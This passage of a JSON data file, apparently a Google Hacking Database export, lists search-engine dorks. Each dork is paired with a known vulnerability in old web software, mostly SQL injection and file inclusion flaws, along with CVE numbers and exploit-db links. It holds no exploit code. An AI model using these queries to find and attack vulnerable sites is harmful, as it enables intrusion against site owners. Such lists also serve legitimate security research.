Steamcast \"0.9.75 beta", "id": 1976}, {"short description": "Powered by Maian Guestbook v3.2", "long description": "Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: http://www.exploit-db.com/exploits/6061", "submited": "2010-11-15", "request": "Powered by Maian Guestbook v3.2", "id": 1977}, {"short description": "inurl:acrotxt.php wbb", "long description": "WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: http://www.exploit-db.com/exploits/4327", "submited": "2010-11-15", "request": "inurl:acrotxt.php wbb", "id": 1978}, {"short description": "Designed by:InterTech Co", "long description": "InterTech Co 1.0 SQL Injection: http://www.exploit-db.com/exploits/11440", "submited": "2010-11-15", "request": "Designed by:InterTech Co", "id": 1981}, {"short description": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "long description": "XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: http://www.exploit-db.com/exploits/5158", "submited": "2010-11-15", "request": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "id": 1982}, {"short description": "News powered by ashnews", "long description": "ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: http://www.exploit-db.com/exploits/1864", "submited": "2010-11-15", "request": "News powered by ashnews", "id": 1984}, {"short description": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "long description": "Transload Script Upload Vulnerability: http://www.exploit-db.com/exploits/11155", "submited": "2010-11-15", "request": "\"Transloader by Somik.org\" OR \"Transloader by\" OR \"Transloder\"", "id": 1985}, {"short description": "allinurl: \"modules MyAnnonces index php pa view\"", "long description": "RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: http://www.exploit-db.com/exploits/5156", "submited": "2010-11-15", "request": "allinurl: \"modules MyAnnonces index php pa view\"", "id": 1986}, {"short description": "\"News Managed by Ditto News\"", "long description": "Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/1887", "submited": "2010-11-15", "request": "\"News Managed by Ditto News\"", "id": 1987}, {"short description": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "long description": "ArticlesOne 07232006 (page) Remote Include Vulnerability: http://www.exploit-db.com/exploits/2063", "submited": "2010-11-15", "request": "Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com", "id": 1988}, {"short description": "Coded By WebLOADER", "long description": "Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12647", "submited": "2010-11-15", "request": "Coded By WebLOADER", "id": 1989}, {"short description": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "long description": "Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: http://www.exploit-db.com/exploits/3295", "submited": "2010-11-15", "request": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "id": 1990}, {"short description": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "long description": "CubeCart (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11495", "submited": "2010-11-15", "request": "\"powered by CubeCart\" inurl:\"index.php?_a=\"", "id": 1991}, {"short description": "inurl:\"com_jjgallery", "long description": "Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: http://www.exploit-db.com/exploits/4626", "submited": "2010-11-15", "request": "inurl:\"com_jjgallery", "id": 1992}, {"short description": "intext:\"jPORTAL 2\"  inurl:\"mailer.php\"", "long description": "jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: http://www.exploit-db.com/exploits/4611", "submited": "2010-11-15", "request": "intext:\"jPORTAL 2\"  inurl:\"mailer.php\"", "id": 1993}, {"short description": "intext: \"Site developed &amp; mantained by Woodall Creative Group\"", "long description": "Woodall Creative SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12576", "submited": "2010-11-15", "request": "intext: \"Site developed &amp; mantained by Woodall Creative Group\"", "id": 1994}, {"short description": "inurl:CuteSoft_Client/CuteEditor", "long description": "Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: http://www.exploit-db.com/exploits/8785", "submited": "2010-11-15", "request": "inurl:CuteSoft_Client/CuteEditor", "id": 1996}, {"short description": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "long description": "WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: http://www.exploit-db.com/exploits/2604", "submited": "2010-11-15", "request": "\"Web Group Communication Center beta 0.5.6\" OR \"Web Group Communication Center beta 0.5.5\"", "id": 1997}, {"short description": "Actionne par smartblog", "long description": "Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: http://www.exploit-db.com/exploits/5535", "submited": "2010-11-15", "request": "Actionne par smartblog", "id": 1998}, {"short description": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "long description": "PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6436", "submited": "2010-11-15", "request": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "id": 1999}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6951", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 2000}, {"short description": "inurl:tr.php?id=", "long description": "Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6950", "submited": "2010-11-15", "request": "inurl:tr.php?id=", "id": 2001}, {"short description": "allintext:\"Browse Blogs by Category\"", "long description": "Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: http://www.exploit-db.com/exploits/4206", "submited": "2010-11-15", "request": "allintext:\"Browse Blogs by Category\"", "id": 2002}, {"short description": "inurl:option=com_mydyngallery", "long description": "Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: http://www.exploit-db.com/exploits/7343", "submited": "2010-11-15", "request": "inurl:option=com_mydyngallery", "id": 2004}, {"short description": "inurl:index.php?mod=sondages", "long description": "KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: http://www.exploit-db.com/exploits/4422", "submited": "2010-11-15", "request": "inurl:index.php?mod=sondages", "id": 2006}, {"short description": "inurl:\"tr1.php?id=\" Forced Matrix", "long description": "YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6939", "submited": "2010-11-15", "request": "inurl:\"tr1.php?id=\" Forced Matrix", "id": 2009}, {"short description": "allintext:\"SuperCali Event Calendar\"", "long description": "SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: http://www.exploit-db.com/exploits/4141", "submited": "2010-11-15", "request": "allintext:\"SuperCali Event Calendar\"", "id": 2010}, {"short description": "inurl:\"com_ckforms\"", "long description": "Joomla Component (com_ckforms) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/15453", "submited": "2010-11-15", "request": "inurl:\"com_ckforms\"", "id": 2011}, {"short description": "inurl:\"com_prayercenter\"", "long description": "Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: http://www.exploit-db.com/exploits/5708/", "submited": "2010-11-15", "request": "inurl:\"com_prayercenter\"", "id": 2012}, {"short description": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "long description": "Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9010", "submited": "2010-11-15", "request": "\"Powered by Glossword 1.8.11\" OR \"Powered by Glossword 1.8.6\"", "id": 2013}, {"short description": "ADP Forum 2.0.3 is powered by VzScripts", "long description": "Vz (Adp) Forum 2.0.3 Remote Password Disclosure Vulnerablity - CVE: 2006-6891: http://www.exploit-db.com/exploits/3053", "submited": "2010-11-15", "request": "ADP Forum 2.0.3 is powered by VzScripts", "id": 2014}, {"short description": "inurl:\"com_ccnewsletter\"", "long description": "Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: http://www.exploit-db.com/exploits/11282", "submited": "2010-11-15", "request": "inurl:\"com_ccnewsletter\"", "id": 2015}, {"short description": "inurl:\"add_soft.php\"", "long description": "Software Index 1.1 (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5378", "submited": "2010-11-15", "request": "inurl:\"add_soft.php\"", "id": 2016}, {"short description": "pages.php?id= \"Multi Vendor Mall\"", "long description": "Multi Vendor Mall (itemdetail.php &amp; shop.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12755", "submited": "2010-11-15", "request": "pages.php?id= \"Multi Vendor Mall\"", "id": 2017}, {"short description": "\"Search Affiliate Programs:\"", "long description": "Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: http://www.exploit-db.com/exploits/5363", "submited": "2010-11-15", "request": "\"Search Affiliate Programs:\"", "id": 2018}, {"short description": "intitle:\"Dacio's Image Gallery\"", "long description": "Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: http://www.exploit-db.com/exploits/8653", "submited": "2010-11-15", "request": "intitle:\"Dacio&#039;s Image Gallery\"", "id": 2019}, {"short description": "\"Website by Spokane Web Communications\"", "long description": "ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12526", "submited": "2010-11-15", "request": "\"Website by Spokane Web Communications\"", "id": 2020}, {"short description": "\"powered by: elkagroup\"", "long description": "elkagroup SQL Injection Vulnerability - CVE: 2009-4569: http://www.exploit-db.com/exploits/10330", "submited": "2010-11-15", "request": "\"powered by: elkagroup\"", "id": 2022}, {"short description": "allinurl:/myspeach/", "long description": "MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: http://www.exploit-db.com/exploits/2301", "submited": "2010-11-15", "request": "allinurl:/myspeach/", "id": 2023}, {"short description": "Powered by Revsense", "long description": "RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: http://www.exploit-db.com/exploits/7163", "submited": "2010-11-15", "request": "Powered by Revsense", "id": 2024}, {"short description": "724CMS Powered, 724CMS Version 4.59. Enterprise", "long description": "724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: http://www.exploit-db.com/exploits/12560", "submited": "2010-11-15", "request": "724CMS Powered, 724CMS Version 4.59. Enterprise", "id": 2025}, {"short description": "index.php?option=com_facileforms", "long description": "Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: http://www.exploit-db.com/exploits/5915", "submited": "2010-11-15", "request": "index.php?option=com_facileforms", "id": 2026}, {"short description": "Powered By phUploader", "long description": "phUploader Remote File Upload Vulnerability - CVE: 2007-4527: http://www.exploit-db.com/exploits/10574", "submited": "2010-11-15", "request": "Powered By phUploader", "id": 2027}, {"short description": "inurl:\"myLDlinker.php\"", "long description": "WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: http://www.exploit-db.com/exploits/14441", "submited": "2010-11-15", "request": "inurl:\"myLDlinker.php\"", "id": 2028}, {"short description": "inurl:com_idoblog", "long description": "Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: http://www.exploit-db.com/exploits/5730", "submited": "2010-11-15", "request": "inurl:com_idoblog", "id": 2029}, {"short description": "/modules/xhresim/", "long description": "XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: http://www.exploit-db.com/exploits/6748", "submited": "2010-11-15", "request": "/modules/xhresim/", "id": 2030}, {"short description": "Maian Events v2.0 Copyright 2005-2008 Maian Script World. All Rights Reserved", "long description": "Maian Events 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6048", "submited": "2010-11-15", "request": "Maian Events v2.0 Copyright 2005-2008 Maian Script World. All Rights Reserved", "id": 2032}, {"short description": "\"Powered by FubarForum v1.5\"", "long description": "FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: http://www.exploit-db.com/exploits/5872", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.5\"", "id": 2033}, {"short description": "/modules/amevents/print.php?id=", "long description": "XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: http://www.exploit-db.com/exploits/7479", "submited": "2010-11-15", "request": "/modules/amevents/print.php?id=", "id": 2034}, {"short description": "allinurl: com_gallery \"func\"", "long description": "Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: http://www.exploit-db.com/exploits/5084", "submited": "2010-11-15", "request": "allinurl: com_gallery \"func\"", "id": 2036}, {"short description": "\"pForum 1.29a\"  OR \"\"Powie's PSCRIPT Forum 1.26\"", "long description": "Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: http://www.exploit-db.com/exploits/2797", "submited": "2010-11-15", "request": "\"pForum 1.29a\"  OR \"\"Powie&#039;s PSCRIPT Forum 1.26\"", "id": 2037}, {"short description": "allinurl: \"/modules/myTopics/\"", "long description": "XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: http://www.exploit-db.com/exploits/5148", "submited": "2010-11-15", "request": "allinurl: \"/modules/myTopics/\"", "id": 2038}, {"short description": "inurl:\"com_ckforms\"", "long description": "Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: http://www.exploit-db.com/exploits/11785", "submited": "2010-11-15", "request": "inurl:\"com_ckforms\"", "id": 2039}, {"short description": "allinurl:\"index.php?site=\" \"W-Agora\"", "long description": "w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: http://www.exploit-db.com/exploits/4817", "submited": "2010-11-15", "request": "allinurl:\"index.php?site=\" \"W-Agora\"", "id": 2040}, {"short description": "inurl:categoria.php?ID= comune", "long description": "Prometeo v1.0.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14806", "submited": "2010-11-15", "request": "inurl:categoria.php?ID= comune", "id": 2041}, {"short description": "inurl:\"index.php?m_id=\"", "long description": "slogan design Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12849", "submited": "2010-11-15", "request": "inurl:\"index.php?m_id=\"", "id": 2043}, {"short description": "Powered by MVC-Web CMS  inurl:/index.asp?newsid=", "long description": "MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5912", "submited": "2010-11-15", "request": "Powered by MVC-Web CMS  inurl:/index.asp?newsid=", "id": 2044}, {"short description": "allinurl: \"showCat.php?cat_id\"", "long description": "D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5291", "submited": "2010-11-15", "request": "allinurl: \"showCat.php?cat_id\"", "id": 2045}, {"short description": "\"Web site engine's code is copyright 2001-2007 ATutor\"", "long description": "ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: http://www.exploit-db.com/exploits/6153", "submited": "2010-11-15", "request": "\"Web site engine&#039;s code is copyright 2001-2007 ATutor\"", "id": 2046}, {"short description": "\"PhpLinkExchange v1.02\"", "long description": "PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: http://www.exploit-db.com/exploits/10495", "submited": "2010-11-15", "request": "\"PhpLinkExchange v1.02\"", "id": 2047}, {"short description": "\"ClanSys v.1.1\"", "long description": "Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: http://www.exploit-db.com/exploits/1710", "submited": "2010-11-15", "request": "\"ClanSys v.1.1\"", "id": 2048}, {"short description": "inurl:inc_accountlistmanager.asp", "long description": "DMXReady Account List Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7754", "submited": "2010-11-15", "request": "inurl:inc_accountlistmanager.asp", "id": 2049}, {"short description": "inurl:com_jomestate", "long description": "Joomla Hot Property com_jomestate RFI Vulnerability: http://www.exploit-db.com/exploits/13956", "submited": "2010-11-15", "request": "inurl:com_jomestate", "id": 2050}, {"short description": "Cr par Narfight, ClanLite V2.2006.05.20 2000-2005", "long description": "ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: http://www.exploit-db.com/exploits/5595", "submited": "2010-11-15", "request": "Cr par Narfight, ClanLite V2.2006.05.20 2000-2005", "id": 2051}, {"short description": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "long description": "AR Memberscript (usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: http://www.exploit-db.com/exploits/2931", "submited": "2010-11-15", "request": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "id": 2052}, {"short description": "\"Copyright Interactivefx.ie\"", "long description": "Interactivefx.ie CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11873", "submited": "2010-11-15", "request": "\"Copyright Interactivefx.ie\"", "id": 2053}, {"short description": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "long description": "Atomic Photo Album 1.0.2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14801", "submited": "2010-11-15", "request": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "id": 2054}, {"short description": "inurl:tr.php?id= Hosting", "long description": "YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: http://www.exploit-db.com/exploits/6948", "submited": "2010-11-15", "request": "inurl:tr.php?id= Hosting", "id": 2055}, {"short description": "allinur:com_extended_registration", "long description": "Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: http://www.exploit-db.com/exploits/2379", "submited": "2010-11-15", "request": "allinur:com_extended_registration", "id": 2056}, {"short description": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "long description": "Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: http://www.exploit-db.com/exploits/6437", "submited": "2010-11-15", "request": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "id": 2057}, {"short description": "inurl:com_rapidrecipe \"recipe_id\"", "long description": "Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: http://www.exploit-db.com/exploits/5759", "submited": "2010-11-15", "request": "inurl:com_rapidrecipe \"recipe_id\"", "id": 2058}, {"short description": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "long description": "Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: http://www.exploit-db.com/exploits/4620", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "id": 2059}, {"short description": "Powered by PowerPortal v1.3a", "long description": "PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: http://www.exploit-db.com/exploits/2454", "submited": "2010-11-15", "request": "Powered by PowerPortal v1.3a", "id": 2060}, {"short description": "Powered by DUdforum 3.0     inurl:/forums.asp?iFor=", "long description": "DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5894", "submited": "2010-11-15", "request": "Powered by DUdforum 3.0     inurl:/forums.asp?iFor=", "id": 2061}, {"short description": "\"powered by kure\"", "long description": "Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: http://www.exploit-db.com/exploits/6767", "submited": "2010-11-15", "request": "\"powered by kure\"", "id": 2062}, {"short description": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "long description": "Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: http://www.exploit-db.com/exploits/7493", "submited": "2010-11-15", "request": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "id": 2065}, {"short description": "inurl:modules.php?name=Shopping_Cart", "long description": "PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: http://www.exploit-db.com/exploits/10615", "submited": "2010-11-15", "request": "inurl:modules.php?name=Shopping_Cart", "id": 2066}, {"short description": "allinurl: galid \"index.php?p=gallerypic\"", "long description": "Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5413", "submited": "2010-11-15", "request": "allinurl: galid \"index.php?p=gallerypic\"", "id": 2067}, {"short description": "intext:\"powered by itaco group\"", "long description": "ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11012", "submited": "2010-11-15", "request": "intext:\"powered by itaco group\"", "id": 2068}, {"short description": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "long description": "yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2292", "submited": "2010-11-15", "request": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "id": 2069}, {"short description": "mediaHolder.php?id", "long description": "WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6842", "submited": "2010-11-15", "request": "mediaHolder.php?id", "id": 2070}, {"short description": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright 2006 ActualScripts\"", "long description": "ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability - CVE: 2008-2076: http://www.exploit-db.com/exploits/5528", "submited": "2010-11-15", "request": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright 2006 ActualScripts\"", "id": 2071}, {"short description": "\"powered by seditio\" OR \"powered by ldu\"", "long description": "Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: http://www.exploit-db.com/exploits/4235", "submited": "2010-11-15", "request": "\"powered by seditio\" OR \"powered by ldu\"", "id": 2072}, {"short description": "inurl:com_forum", "long description": "com_forum Mambo Component", "submited": "2010-11-15", "request": "inurl:com_forum", "id": 2073}, {"short description": "Powered By AJ Auction", "long description": "AJ Auction v1 (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5868", "submited": "2010-11-15", "request": "Powered By AJ Auction", "id": 2074}, {"short description": "\"Powered by Content Injector v1.52\"", "long description": "Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: http://www.exploit-db.com/exploits/4645", "submited": "2010-11-15", "request": "\"Powered by Content Injector v1.52\"", "id": 2075}, {"short description": "Events Calendar 1.1", "long description": "Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: http://www.exploit-db.com/exploits/6623", "submited": "2010-11-15", "request": "Events Calendar 1.1", "id": 2077}, {"short description": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "long description": "Simple PHP Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10666", "submited": "2010-11-15", "request": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "id": 2078}, {"short description": "inurl:inc_linksmanager.asp", "long description": "DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7772", "submited": "2010-11-15", "request": "inurl:inc_linksmanager.asp", "id": 2079}, {"short description": "inurl:/index.php?option=com_otzivi", "long description": "Joomla Component com_otzivi Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10966", "submited": "2010-11-15", "request": "inurl:/index.php?option=com_otzivi", "id": 2080}, {"short description": "\"Powered by DigitalHive\"", "long description": "DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: http://www.exploit-db.com/exploits/2566", "submited": "2010-11-15", "request": "\"Powered by DigitalHive\"", "id": 2082}, {"short description": "inurl:\"com_casino_blackjack\"", "long description": "Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: http://www.exploit-db.com/exploits/8743", "submited": "2010-11-15", "request": "inurl:\"com_casino_blackjack\"", "id": 2083}, {"short description": "inurl:\"/tagit2b/\"", "long description": "TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: http://www.exploit-db.com/exploits/2450", "submited": "2010-11-15", "request": "inurl:\"/tagit2b/\"", "id": 2084}, {"short description": "\"powered by LionWiki \"", "long description": "LionWiki 3.X (index.php) Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12075", "submited": "2010-11-15", "request": "\"powered by LionWiki \"", "id": 2085}, {"short description": "allinurl: \"index.php?area\"galid", "long description": "Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5414", "submited": "2010-11-15", "request": "allinurl: \"index.php?area\"galid", "id": 2086}, {"short description": "inurl:\"tr1.php?id=\"", "long description": "YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: http://www.exploit-db.com/exploits/6942", "submited": "2010-11-15", "request": "inurl:\"tr1.php?id=\"", "id": 2087}, {"short description": "\"Designed by Spaceacre\"", "long description": "Spaceacre Multiple SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12551", "submited": "2010-11-15", "request": "\"Designed by Spaceacre\"", "id": 2088}, {"short description": "Powered by Shadowed Portal", "long description": "Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4769", "submited": "2010-11-15", "request": "Powered by Shadowed Portal", "id": 2089}, {"short description": "\"Powered by: PhotoPost PHP 4.6.5\"", "long description": "PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: http://www.exploit-db.com/exploits/14453", "submited": "2010-11-15", "request": "\"Powered by: PhotoPost PHP 4.6.5\"", "id": 2090}, {"short description": "inurl:\"com_otzivi\"", "long description": "Joomla Component com_otzivi Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/11494", "submited": "2010-11-15", "request": "inurl:\"com_otzivi\"", "id": 2091}, {"short description": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "long description": "GeneShop 5.1.1 SQL Injection Vunerability: http://www.exploit-db.com/exploits/12442", "submited": "2010-11-15", "request": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "id": 2092}, {"short description": "\"Powered by PsNews\"", "long description": "PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: http://www.exploit-db.com/exploits/4174", "submited": "2010-11-15", "request": "\"Powered by PsNews\"", "id": 2093}, {"short description": "inurl:inc_faqsmanager.asp", "long description": "DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7770", "submited": "2010-11-15", "request": "inurl:inc_faqsmanager.asp", "id": 2094}, {"short description": "\"powered by sX-Shop\"", "long description": "sX-Shop Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/14558", "submited": "2010-11-15", "request": "\"powered by sX-Shop\"", "id": 2095}, {"short description": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "long description": "ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: http://www.exploit-db.com/exploits/11080", "submited": "2010-11-15", "request": "intext:&#039;Powered by ProArcadeScript &#039; inurl:&#039;game.php?id=&#039;", "id": 2096}, {"short description": "inurl:tr.php?id= Downline", "long description": "YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: http://www.exploit-db.com/exploits/6935", "submited": "2010-11-15", "request": "inurl:tr.php?id= Downline", "id": 2097}, {"short description": "inurl:tr.php?id= Autoresponder", "long description": "YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: http://www.exploit-db.com/exploits/6938", "submited": "2010-11-15", "request": "inurl:tr.php?id= Autoresponder", "id": 2098}, {"short description": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "long description": "PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: http://www.exploit-db.com/exploits/8330", "submited": "2010-11-15", "request": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "id": 2099}, {"short description": "\"powered by webClassifieds\"", "long description": "webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: http://www.exploit-db.com/exploits/7602", "submited": "2010-11-15", "request": "\"powered by webClassifieds\"", "id": 2100}, {"short description": "inurl:/modules/Partenaires/clic.php?id=", "long description": "Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: http://www.exploit-db.com/exploits/14556", "submited": "2010-11-15", "request": "inurl:/modules/Partenaires/clic.php?id=", "id": 2101}, {"short description": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "long description": "Softbiz Jobs &amp; Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: http://www.exploit-db.com/exploits/4504", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "id": 2102}, {"short description": "inurl:com_jabode", "long description": "Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: http://www.exploit-db.com/exploits/5963", "submited": "2010-11-15", "request": "inurl:com_jabode", "id": 2103}, {"short description": "\"powered by DBHcms\"", "long description": "DBHcms 1.1.4 Stored XSS: http://www.exploit-db.com/exploits/12499", "submited": "2010-11-15", "request": "\"powered by DBHcms\"", "id": 2104}, {"short description": "inurl:\"nabopoll/\"", "long description": "nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: http://www.exploit-db.com/exploits/3305", "submited": "2010-11-15", "request": "inurl:\"nabopoll/\"", "id": 2105}, {"short description": "intext:\"sitio web disenado por www.toronja.com.pe\"", "long description": "Toronja Cms HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12771", "submited": "2010-11-15", "request": "intext:\"sitio web disenado por www.toronja.com.pe\"", "id": 2108}, {"short description": "\"Powered by CMScout 2005 CMScout 